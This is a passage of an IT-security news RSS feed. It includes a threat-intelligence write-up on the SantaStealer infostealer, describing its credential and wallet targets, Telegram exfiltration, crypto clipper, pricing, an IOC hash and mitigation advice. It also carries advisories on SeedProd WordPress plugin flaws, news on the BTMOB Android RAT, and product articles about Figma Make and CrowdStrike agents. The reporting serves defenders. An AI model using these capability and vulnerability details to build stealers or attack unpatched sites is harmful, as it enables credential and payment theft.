<description><![CDATA[  Cybercriminals have been actively exploiting a critical flaw in the widely deployed Funnel Builder plugin in order to harvest customer payment information during online transactions in a newly uncovered attack campaign, once again highlighting the security risks that face…
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3560147/it-security-nachrichten/wordpress-plugin-security-failure-opens-door-to-payment-data-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560147/it-security-nachrichten/wordpress-plugin-security-failure-opens-door-to-payment-data-theft/</guid>
<pubDate>Sun, 31 May 2026 06:36:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Cybercriminals have been actively exploiting a critical flaw in the widely deployed Funnel Builder plugin in order to harvest customer payment information during online transactions in a newly uncovered attack campaign, once again highlighting the security risks that face…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/wordpress-plugin-security-failure-opens-door-to-payment-data-theft/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/wordpress-plugin-security-failure-opens-door-to-payment-data-theft/">WordPress Plugin Security Failure Opens Door to Payment Data Theft</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and…]]></title>
<description><![CDATA[SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and Session CookiesThreat actors leverage SantaStealer for stealer logs generation, account takeover campaigns, crypto theft, and large-scale data breach operations across darkweb ecosystemsWhat is SantaSteal...]]></description>
<link>https://tsecurity.de/de/3559918/hacking/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559918/hacking/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and/</guid>
<pubDate>Sun, 31 May 2026 03:04:43 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and Session Cookies</h3><blockquote>Threat actors leverage SantaStealer for stealer logs generation, account takeover campaigns, crypto theft, and large-scale data breach operations across darkweb ecosystems</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8qX4W9yEzYZFMhdW2wKzQ.jpeg"></figure><h4>What is SantaStealer?</h4><p>SantaStealer, a newly identified Malware-as-a-Service (MaaS) infostealer, is being actively marketed within cybercriminal communities as a modular credential theft platform capable of harvesting browser credentials, session cookies, crypto wallet data, VPN configurations, FTP credentials, gaming accounts, and email client sessions. The malware also integrates a cryptocurrency clipper capable of silently hijacking copied wallet addresses during transactions, enabling direct crypto theft even when credential harvesting operations yield limited results. Researchers from TW360 Threat Intelligence assess SantaStealer as part of the growing industrialization of the infostealer ecosystem, where threat actors monetize stolen credentials, stealer logs, authentication cookies, and financial data through darkweb marketplaces, Telegram channels, and initial access broker networks.</p><h3>SantaStealer Login Portal and Affiliate Access</h3><p>The operation exposes a branded affiliate-facing login panel designed for controlled onboarding and malware distribution management. Unlike open-access commodity malware services, SantaStealer appears to rely on account-key provisioning rather than self-registration, indicating a more curated affiliate model commonly observed among mature cybercrime operations. The onboarding workflow reflects a commercially structured Malware-as-a-Service infrastructure focused on scalability, affiliate management, and operational control. The branding, clean interface, and simplified access process further demonstrate how modern cybercriminal operations increasingly mirror legitimate SaaS business models.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*I4uEKs0F94DhbpJ3LqPnVg.png"><figcaption><em>Figure 1 — SantaStealer login and affiliate access portal.</em></figcaption></figure><h3>Modular Stealer Builder Enables Targeted Data Theft</h3><p>Once authenticated, affiliates gain access to the SantaStealer build configuration dashboard, where individual modules can be selectively enabled or disabled depending on operational requirements. The malware builder supports harvesting browser credentials, saved passwords, session cookies, crypto wallet files, FTP credentials, VPN configurations, gaming sessions, and email client data. Observed application targets include FileZilla, Atomic Wallet, Electrum Wallet, Cake Wallet, Ledger Live, Steam, Microsoft Outlook, Thunderbird, and WinSCP, indicating that the malware is specifically engineered to target both consumer and enterprise authentication artifacts.</p><p>The panel explicitly references %APPDATA% and %LOCALAPPDATA% paths used for credential extraction and session harvesting. Additional functionality exposed in the builder includes Telegram Bot API exfiltration, fake error popup generation, configurable execution delays, campaign watermarking, and custom application path targeting. The “Application Data Collector” module appears specifically designed to aggregate authentication artifacts across browsers, VPN clients, FTP software, gaming platforms, and cryptocurrency applications within a single execution cycle, increasing the likelihood of successful account takeover and credential abuse operations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1zF2ZDmIX6gtRcRjVZtzuw.png"><figcaption><em>Figure 2 — SantaStealer configuration dashboard exposing targeted applications, Telegram exfiltration, and modular credential harvesting.</em></figcaption></figure><h3>Crypto Clipper Targets Cryptocurrency Transactions</h3><p>SantaStealer also includes a separately compiled cryptocurrency clipper module designed for wallet hijacking and transaction interception. The clipper continuously monitors clipboard activity and automatically replaces copied cryptocurrency wallet addresses with attacker-controlled alternatives before transactions are completed. Supported blockchain ecosystems include Bitcoin, Ethereum, Monero, Litecoin, Solana, Ripple, Dogecoin, and TRON, demonstrating broad targeting across mainstream cryptocurrency networks.</p><p>Researchers observed that the clipper module is encrypted independently before being bundled into the final payload through the loader and dropper functionality. Notably, panel documentation indicates that if affiliates fail to configure replacement wallet addresses, default operator-controlled wallets may automatically be used instead. This mechanism potentially creates an additional passive monetization stream for the malware operators themselves, allowing them to profit even from poorly configured affiliate campaigns.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*z5BXcBIyV9vOWwboyB80ig.png"><figcaption><em>Figure 3 — SantaStealer crypto clipper configuration panel supporting multiple cryptocurrency ecosystems.</em></figcaption></figure><h3>Feature Matrix Reveals Technical Capabilities</h3><p>The SantaStealer feature comparison panel provides additional insight into the malware’s technical capabilities and operational design. The operator advertises fully silent execution, no visible console windows, minimal CPU usage, Windows 7, 10, and 11 compatibility, heuristic file discovery, crypto keyword scanning, modular architecture across 14 modules, and optional CIS region blocking functionality. The malware claims asynchronous data collection completing within approximately five seconds of execution, producing uncompressed stealer logs ranging between 1 MB and 10 MB.</p><p>The optional CIS filtering functionality is particularly notable because it mirrors operational security patterns frequently associated with Russian-speaking cybercriminal groups attempting to avoid regional law enforcement attention. Premium and Lifetime subscription tiers additionally unlock heuristic crypto-related file targeting and recursive file discovery functionality, significantly increasing the malware’s ability to identify sensitive financial and authentication-related data across infected systems.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G_jtAkkzme0l_M224xtfmA.png"><figcaption><em>Figure 4 — SantaStealer feature matrix highlighting stealth execution, modularity, CIS filtering, and asynchronous data collection capabilities.</em></figcaption></figure><h3>Subscription Pricing and Criminal Monetization</h3><p>SantaStealer is monetized using a tiered subscription structure that closely resembles legitimate commercial software licensing models. The Basic plan is priced at $200 per month, while the Premium plan costs $300 per month and unlocks additional functionality including heuristic scanning, expanded targeting capabilities, and cryptocurrency clipper support. A Lifetime plan is also advertised for a one-time payment of $1,000, positioning the malware as a long-term operational investment for threat actors conducting persistent credential theft and financial fraud campaigns.</p><p>Researchers assess that SantaStealer operators likely generate revenue through two separate monetization channels simultaneously. The first comes from affiliate subscription payments, while the second likely originates from passive cryptocurrency theft through clipper misconfigurations where default operator wallet addresses remain active. This architecture incentivizes widespread deployment regardless of affiliate sophistication and reflects the broader commercialization trend currently dominating the Malware-as-a-Service ecosystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Dyx4wmA0MmUT3zzMJylLOA.png"><figcaption><em>Figure 5 — SantaStealer subscription pricing structure and feature segmentation.</em></figcaption></figure><h3>Threat Intelligence Assessment</h3><p>SantaStealer represents a growing category of advanced infostealers engineered for scalable credential theft, session hijacking, account takeover, and financial fraud operations. The malware’s combination of browser credential theft, session cookie harvesting, Telegram-based exfiltration, crypto wallet extraction, clipboard hijacking, modular payload generation, and stealer log creation positions it as a significant threat for organizations facing phishing campaigns, ransomware intrusions, business email compromise (BEC), and darkweb credential exposure.</p><p>The increasing availability of MaaS infostealers significantly lowers the barrier to entry for cybercriminal affiliates, enabling even low-skilled threat actors to conduct sophisticated credential theft and data breach operations at scale. The commercialization of stealer malware also increases the availability of stolen authentication artifacts across darkweb ecosystems, directly contributing to credential stuffing attacks, enterprise account takeover incidents, and unauthorized access operations targeting both individuals and organizations.</p><h3>Indicators of Compromise (IOCs)</h3><pre>SHA-256:<br>055d777c3d38269f07d454f07abc985dfa52493b669cd3cc687304a0a6425122<br><br>Infrastructure:<br>Telegram Bot API: Operator-Controlled C2 Panel<br><br>VirusTotal: https://www.virustotal.com/gui/file/055d777c3d38269f07d454f07abc985dfa52493b669cd3cc687304a0a6425122<br></pre><h3>Detection and Mitigation Recommendations</h3><p>Organizations should immediately block the identified SHA-256 hash across endpoints, email gateways, proxies, and SIEM platforms. SOC teams should monitor for suspicious connections to api.telegram.org, unusual clipboard activity, and unauthorized access to browser credential stores, VPN configurations, FTP clients, email applications, and crypto wallet files.</p><p>Since SantaStealer steals passwords, session cookies, and authentication data, exposed credentials should be reset immediately and all active sessions should be revoked to prevent account takeover. Organizations should also enforce phishing-resistant MFA such as FIDO2 or WebAuthn security keys, as stolen session cookies can bypass traditional MFA protections.</p><p>Infostealer malware like SantaStealer often leads to stolen credentials and stealer logs being sold on darkweb forums and Telegram channels, increasing the risk of ransomware, account takeover, and data breach incidents.</p><p>ThreatWatch360’s <a href="https://threatwatch360.com/solution/breacheye">BreachEye Darkweb Monitoring Platform</a> helps CISO, SOC, and IT teams identify exposed employee credentials, stealer log infections, leaked corporate accounts, and darkweb data breach activity in real time.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=2b8d9707d985" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/santastealer-emerges-as-advanced-maas-infostealer-targeting-credentials-crypto-wallets-and-2b8d9707d985">SantaStealer Emerges as Advanced MaaS Infostealer Targeting Credentials, Crypto Wallets, and…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Missing Authorization via seedprod_lite_new_lpage]]></title>
<description><![CDATA[The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21...]]></description>
<link>https://tsecurity.de/de/3557879/sicherheitsluecken/missing-authorization-via-seedprodlitenewlpage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557879/sicherheitsluecken/missing-authorization-via-seedprodlitenewlpage/</guid>
<pubDate>Sat, 30 May 2026 01:17:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>Website Builder by SeedProd 6.0.5</li>
        
            <li>Website Builder by SeedProd 6.0.6</li>
        
            <li>Website Builder by SeedProd 6.0.7</li>
        
            <li>Website Builder by SeedProd 6.0.8</li>
        
            <li>Website Builder by SeedProd 6.0.8.1</li>
        
            <li>Website Builder by SeedProd 6.0.8.2</li>
        
            <li>Website Builder by SeedProd 6.0.8.3</li>
        
            <li>Website Builder by SeedProd 6.0.8.4</li>
        
            <li>Website Builder by SeedProd 6.0.8.5</li>
        
            <li>Website Builder by SeedProd 6.0.9.0</li>
        
            <li>Website Builder by SeedProd 6.0.10.1</li>
        
            <li>Website Builder by SeedProd 6.0.11.1</li>
        
            <li>Website Builder by SeedProd 6.2.0</li>
        
            <li>Website Builder by SeedProd 6.2.1</li>
        
            <li>Website Builder by SeedProd 6.2.2</li>
        
            <li>Website Builder by SeedProd 6.2.3</li>
        
            <li>Website Builder by SeedProd 6.2.4</li>
        
            <li>Website Builder by SeedProd 6.2.5</li>
        
            <li>Website Builder by SeedProd 6.6.0</li>
        
            <li>Website Builder by SeedProd 6.9.0.8</li>
        
            <li>Website Builder by SeedProd 6.10.0</li>
        
            <li>Website Builder by SeedProd 6.12.0</li>
        
            <li>Website Builder by SeedProd 6.12.2</li>
        
            <li>Website Builder by SeedProd 6.13.0</li>
        
            <li>Website Builder by SeedProd 6.13.1</li>
        
            <li>Website Builder by SeedProd 6.15.3</li>
        
            <li>Website Builder by SeedProd 6.15.4</li>
        
            <li>Website Builder by SeedProd 6.15.6</li>
        
            <li>Website Builder by SeedProd 6.15.7</li>
        
            <li>Website Builder by SeedProd 6.15.13.1</li>
        
            <li>Website Builder by SeedProd 6.15.15.3</li>
        
            <li>Website Builder by SeedProd 6.15.18</li>
        
            <li>Website Builder by SeedProd 6.15.19</li>
        
            <li>Website Builder by SeedProd 6.15.20</li>
        
            <li>Website Builder by SeedProd 6.15.21</li>
        
            <li>Website Builder by SeedProd 6.15.22</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cross-Site Request Forgery in Stripe Connect handler]]></title>
<description><![CDATA[The plugin's Stripe Connect callback writes the seedprod_stripe_connect_token option from a GET parameter without a nonce or capability check. An attacker can trick an admin into visiting a crafted URL and overwrite the connected Stripe token

    This vulnerability affects the following applicat...]]></description>
<link>https://tsecurity.de/de/3557876/sicherheitsluecken/cross-site-request-forgery-in-stripe-connect-handler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557876/sicherheitsluecken/cross-site-request-forgery-in-stripe-connect-handler/</guid>
<pubDate>Sat, 30 May 2026 01:17:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The plugin's Stripe Connect callback writes the seedprod_stripe_connect_token option from a GET parameter without a nonce or capability check. An attacker can trick an admin into visiting a crafted URL and overwrite the connected Stripe token</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>Website Builder by SeedProd 6.15.6</li>
        
            <li>Website Builder by SeedProd 6.15.7</li>
        
            <li>Website Builder by SeedProd 6.15.13.1</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[BTMOB RAT Gives Criminals a Point-and-Click Kit to Take Over Your Android Phone]]></title>
<description><![CDATA[BTMOB sells Android full-device takeover as a kit, no coding needed. It steals data, records screens, and hands attackers remote control for $5,000 lifetime. Most Android malware requires at least some technical competence to deploy, but the BTMOB doesn’t. The developers sell it with a built-in A...]]></description>
<link>https://tsecurity.de/de/3556638/it-security-nachrichten/btmob-rat-gives-criminals-a-point-and-click-kit-to-take-over-your-android-phone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556638/it-security-nachrichten/btmob-rat-gives-criminals-a-point-and-click-kit-to-take-over-your-android-phone/</guid>
<pubDate>Fri, 29 May 2026 11:22:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BTMOB sells Android full-device takeover as a kit, no coding needed. It steals data, records screens, and hands attackers remote control for $5,000 lifetime. Most Android malware requires at least some technical competence to deploy, but the BTMOB doesn’t. The developers sell it with a built-in APK builder that lets buyers generate new malicious apps, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2017-12626 | Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Oracle Flow Builder infinite loop (BID-102879)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1. The impacted element is an unknown function of the component Oracle Flow Builder. Such manipulation leads to infinite loop.

This vulnerability is referenced as CVE-2017-126...]]></description>
<link>https://tsecurity.de/de/3555953/sicherheitsluecken/cve-2017-12626-oracle-application-testing-suite-12503131011320113301-oracle-flow-builder-infinite-loop-bid-102879/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555953/sicherheitsluecken/cve-2017-12626-oracle-application-testing-suite-12503131011320113301-oracle-flow-builder-infinite-loop-bid-102879/</guid>
<pubDate>Fri, 29 May 2026 05:08:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/oracle:application_testing_suite">Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1</a>. The impacted element is an unknown function of the component <em>Oracle Flow Builder</em>. Such manipulation leads to infinite loop.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2017-12626">CVE-2017-12626</a>. It is possible to launch the attack remotely. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[BTMOB Android malware service generates custom phishing payloads]]></title>
<description><![CDATA[An Android remote access trojan named BTMOB is offered to cybercriminals with a builder interface for generating malware payloads tailored to phishing lures. [...]]]></description>
<link>https://tsecurity.de/de/3555585/it-security-nachrichten/btmob-android-malware-service-generates-custom-phishing-payloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555585/it-security-nachrichten/btmob-android-malware-service-generates-custom-phishing-payloads/</guid>
<pubDate>Thu, 28 May 2026 23:22:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An Android remote access trojan named BTMOB is offered to cybercriminals with a builder interface for generating malware payloads tailored to phishing lures. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Asana acquires no-code agent-builder Stack AI]]></title>
<description><![CDATA[Asana will incorporate Stack AI into its growing suite of AI workflow tools.]]></description>
<link>https://tsecurity.de/de/3555479/it-nachrichten/asana-acquires-no-code-agent-builder-stack-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555479/it-nachrichten/asana-acquires-no-code-agent-builder-stack-ai/</guid>
<pubDate>Thu, 28 May 2026 22:17:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Asana will incorporate Stack AI into its growing suite of AI workflow tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[Are designers the new SWEs? Figma Make's new two-way GitHub integration turns designs into live, production code — with built-in governance]]></title>
<description><![CDATA[Cloud design software company Figma is officially transforming its AI design assistant, Figma Make, from a prototyping sandbox into a live, visual software editor that connects natively to production codebases. Announced today, the update allows product managers, designers, and non-technical buil...]]></description>
<link>https://tsecurity.de/de/3554967/it-nachrichten/are-designers-the-new-swes-figma-makes-new-two-way-github-integration-turns-designs-into-live-production-code-with-built-in-governance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554967/it-nachrichten/are-designers-the-new-swes-figma-makes-new-two-way-github-integration-turns-designs-into-live-production-code-with-built-in-governance/</guid>
<pubDate>Thu, 28 May 2026 18:46:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cloud design software company <a href="https://www.figma.com/">Figma</a> is officially transforming its AI design assistant, Figma Make, from a prototyping sandbox into a live, visual software editor that connects natively to production codebases. </p><p>Announced today, <a href="https://www.figma.com/blog/figma-make-now-on-your-local-code/">the update</a> allows product managers, designers, and non-technical builders to import an existing Git repository directly into the Figma desktop app, visually edit the application's underlying code via the canvas, and push those changes back to engineering through standard GitHub pull requests. </p><h2><b>Engineering Governance &amp; Licensing</b></h2><p>Crucially for enterprise deployments, this integration does not bypass established engineering guardrails. Figma Make operates entirely within a standard version control workflow. </p><p>The platform acts as a local development environment where design changes accumulate as local commits. </p><p>When a designer is ready to ship, they generate a branch and open a pull request (PR) directly from Figma Make.</p><p>From an enterprise governance perspective, this means visual AI edits are subject to the exact same continuous integration pipelines, security checks, and code reviews as any traditional engineering commit. </p><p>Figma Make remains a proprietary commercial service available to Full seats on Figma’s paid plans—ranging from $16 per month for Professional teams up to $90 per month for Enterprise deployments—but it interfaces cleanly with open-source and proprietary Git repositories without imposing new licensing restrictions on the generated code. </p><h2><b>Breaking the One-Way Barrier</b></h2><p>When <a href="https://www.figma.com/blog/introducing-figma-make/">Figma Make originally launched a year ago in May 2025</a>, it successfully bridged the gap between static wireframes and interactive prototypes, but it was structurally isolated from the real-world software lifecycle. </p><p>It operated on a rigid, one-way push mechanism: users could export an AI-generated project to a brand-new GitHub repository, but at the time, Figma Make could <i>not</i> receive upstream changes or sync with an existing codebase. </p><p>Today's update fundamentally alters that architecture: by enabling a connection to any Git provider, builders no longer have to maintain parallel, out-of-sync environments. </p><p>Teams can connect a production or sandbox repository, highlight specific UI elements, and use natural language or contextual annotations to prompt Figma’s multi-model AI — which toggles between Anthropic’s Claude 3.7 Sonnet, Claude Opus, and Google’s Gemini models — to write the underlying code. </p><p>The agent dynamically reads the surrounding code architecture, applies the visual edits, and anchors the generated code to the team's existing design system guidelines. </p><h2><b>The Competitive Landscape: Figma Make vs. Lovable vs. Claude Design</b></h2><p>As code generation becomes commoditized by large language models, the competition to own the visual layer of software development has fractured into distinct approaches. </p><p>Figma Make is no longer competing merely with other design canvases; it is contending with full-stack "vibe coding" platforms like <a href="https://venturebeat.com/security/vibe-coded-apps-shadow-ai-s3-bucket-crisis-ciso-audit-framework">Lovable</a> and LLM-native environments like <a href="https://venturebeat.com/technology/anthropic-just-launched-claude-design-an-ai-tool-that-turns-prompts-into-prototypes-and-challenges-figma">Anthropic's Claude Design</a>, which just launched last month. Each platform targets a fundamentally different user and objective:</p><ul><li><p><b>Figma Make (Design-First Systems):</b> Operating at $16 to $90 per month for Full seats, Figma Make caters to established product teams that prioritize brand fidelity. It wins on design system adherence, automatically pulling from existing color tokens, typography rules, component variants, and auto-layout structures. It is built for teams that want deep, layer-based canvas manipulation while keeping code ownership strictly within their existing GitHub architecture. </p></li><li><p><b>Lovable (Code-First Production):</b> Priced at $25 per month for Pro and $50 per month for Business tiers, Lovable functions as a standalone, full-stack application builder. Unlike Figma Make, Lovable relies on a native backend architecture (often paired with databases like Supabase) and a slider-driven UI styling approach. It enforces a strict automatic two-way sync with GitHub, treating the repository as the ultimate source of truth, and is optimized for solo developers or lean startup teams looking to launch production-ready SaaS apps from scratch without maintaining heavy vector design files. </p></li><li><p><b>Claude Design (AI-Native Prototyping):</b> Anthropic’s built-in canvas environment is accessible to users on Claude Pro ($20 per month) or Max ($100–$200 per month) subscriptions. While lacking the granular vector control of Figma Make or the full-stack database integrations of Lovable, Claude Design is ideal for product managers and engineers who need to generate quick, functional UI prototypes and immediately hand them off to coding agents like Claude Code. However, heavy iterative design sprints can quickly burn through Anthropic's strict token limits, making it less viable as a primary design hub. </p></li></ul><h2><b>Navigating the "Vibe Coding" Era</b></h2><p>The emergence of two-way repo synchronization crystallizes the enterprise reality of the "vibe coding" era: the primary bottleneck in product development is shifting from raw engineering bandwidth to architectural governance and design intent. Technical leaders navigating this fast-moving landscape must look past the initial marketing hype to understand exactly who stands to benefit from this new paradigm. </p><p>Figma Make is not a general-purpose, standalone application builder; instead, it is a highly specialized frontend optimization tool designed explicitly for established, mid-to-large cross-functional product teams.</p><p><b>Figma</b> explicitly notes in its documentation that designers who already possess access rights to their company’s existing corporate codebase are currently the best suited for this functionality. Consequently, enterprise leaders should consider adopting Figma Make if they have a mature engineering organization with a well-defined design system, rigid repository guardrails, and a desire to unlock faster iteration cycles. It directly addresses the technical friction felt by the 45% of designers and 59% of product managers who already contribute to code on a regular basis but prefer to operate from a visual canvas rather than a command-line terminal. By turning the canvas into a local development environment, it allows these non-technical builders to execute visual layouts, typography tweaks, and color changes independently, offloading tedious frontend implementation from core engineers.</p><p>Conversely, organizations or teams launching zero-to-one skunkworks projects, or solo developers building lightweight SaaS products from scratch, will find far better utility in a code-first, full-stack platform like <b>Lovable</b>. Because Lovable natively orchestrates backend logic and database integrations like Supabase, it excels at spinning up functional applications rapidly without requiring a pre-existing vector infrastructure or a legacy codebase to pull from. </p><p>Meanwhile, individual product managers or software engineers seeking rapid, text-prompt-driven UI wireframing without rigid design system constraints are better served by the immediacy of <b>Claude Design.</b></p><p>For the enterprise leader wary of overcommitting capital or locking their custom builds into proprietary AI backends, the wisest path forward is compartmentalization. Figma Make’s reliance on standard Git workflows—relying on local commits, isolated branches, and mandatory engineering pull request reviews—means it enforces the exact same security and code quality standards required for enterprise stability. By selecting Figma Make as a targeted frontend bridge for existing systems, and utilizing platforms like Lovable for external, greenfield prototyping, leaders can safely adopt productive new AI tooling without risking their core architectural integrity.</p><h2><b>Why Figma Needs to Keep Innovating</b></h2><p>Figma completed its initial public offering on July 31, 2025, pricing its shares at $33 after immense institutional demand oversubscribed the deal by 40 times. The stock immediately skyrocketed 250% to hit an intraday high of $115.50 on its first trading day. </p><p>However, in the subsequent months, Figma's stock (NYSE: FIG) experienced a severe correction,<a href="https://finance.yahoo.com/news/why-figma-stock-crashed-81-154000916.html"> crashing 81% from its peak </a>to trade around the $21 to $22 range by May 2026, dropping well below its initial IPO price. </p><p>This collapse reduced its market capitalization to approximately $11.3 billion. Financial analysts attribute this aggressive re-rating to structural IPO pricing mechanics, a low float, and the broader "software apocalypse," as investors rapidly rotate capital out of traditional SaaS products and into AI-native workflows.</p><p>The stakes for Figma's current positioning are existential. As enterprises increasingly shift their software spending toward generative AI models and localized coding agents like Claude Design, Claude Code, and OpenAI Codex, traditional "vanilla" cloud design software looks increasingly commoditized. </p><p>Figma Make represents the company's critical counter-offensive in this era of "vibe coding." To regain its premium valuation, Figma must prove to Wall Street that its platform is not merely a static vector canvas that AI tools can easily bypass, but an indispensable, live orchestration layer where human intent, enterprise design systems, and AI-generated production code seamlessly integrate. </p><p>With the new Figma Make two-way Github integration and governance, the company appears well on its way to showing the doubters it has a path a forward in the AI-powered "vibe coding" development era .</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Charlotte AI AgentWorks: Build Your Security Workforce Demo]]></title>
<description><![CDATA[Author: CrowdStrike - Bewertung: 1x - Views:4 Today’s adversaries move at the speed of AI, so defenders need to reason, decide, and act faster across every stage of security operations.

Meet Charlotte AI AgentWorks, a no-code agent builder that enables teams to create mission-ready AI agents dir...]]></description>
<link>https://tsecurity.de/de/3554337/it-security-video/charlotte-ai-agentworks-build-your-security-workforce-demo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554337/it-security-video/charlotte-ai-agentworks-build-your-security-workforce-demo/</guid>
<pubDate>Thu, 28 May 2026 15:34:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: CrowdStrike - Bewertung: 1x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/V2IdXfkH-cU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Today’s adversaries move at the speed of AI, so defenders need to reason, decide, and act faster across every stage of security operations.<br />
<br />
Meet Charlotte AI AgentWorks, a no-code agent builder that enables teams to create mission-ready AI agents directly inside the CrowdStrike Falcon® platform.<br />
<br />
In this video, you’ll see how Charlotte AI AgentWorks helps security teams:<br />
🔹 Define an agent’s mission using natural language and guided instructions<br />
🔹 Refine agent behavior with clarifying questions, knowledge files, model selection, authorized tools, and testing<br />
🔹 Build a SOC Risk Reduction Agent to review detections, cases, remediation activity, coverage gaps, and data ingestion health<br />
🔹 Create a Security Automation & Detection Engineering Agent to identify coverage gaps and generate review-ready detection packages<br />
🔹 Develop a Proactive Security & Compliance Readiness Agent to assess exposures, remediation status, policy alignment, and compliance gaps<br />
🔹 Summarize risk, readiness, and threat intelligence into executive-ready outputs and email updates<br />
<br />
From SOC risk review to detection engineering and compliance readiness, Charlotte AI AgentWorks turns repeatable workflows into structured, agent-driven action. Teams can define the mission, request the right output, validate results, and move from insight to action inside the Falcon platform.<br />
<br />
Every agent built in AgentWorks is secure by design, with built-in guardrails for role-based access, auditability, and human-in-the-loop controls.<br />
<br />
Ready to build your AI security workforce?<br />
<br />
Watch now to see Charlotte AI AgentWorks in action.<br />
<br />
CrowdStrike® Charlotte AI™:<br />
► Explore how Charlotte AI delivers intelligent automation and agentic workflows across the Falcon platform:<br />
https://cs.link/upFJP<br />
<br />
Connect With Us:<br />
► LinkedIn: /crowdstrike<br />
► Twitter: /crowdstrike<br />
► Facebook: /crowdstrike<br />
► Instagram: /crowdstrike<br />
<br />
Subscribe and Stay Updated:<br />
► Subscribe for more insights on AI-powered security, agentic workflows, and the latest innovations from CrowdStrike.<br />
Thanks for watching! If this sparked your interest, share it with your team and let us know what you would build with Charlotte AI AgentWorks.<br />
<br />
#CrowdStrike #CharlotteAI #AgentWorks #AgenticSOC #Cybersecurity #WeStopBreaches<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New BTMOB Malware Lets Attackers Remotely Control Android Devices]]></title>
<description><![CDATA[New Android malware dubbed BTMOB is arming even low-skilled attackers with full remote control over infected phones by combining a powerful RAT engine with a no-code campaign builder toolkit. The threat, first seen in 2025, is now evolving rapidly through…
Read more →
The post New BTMOB Malware L...]]></description>
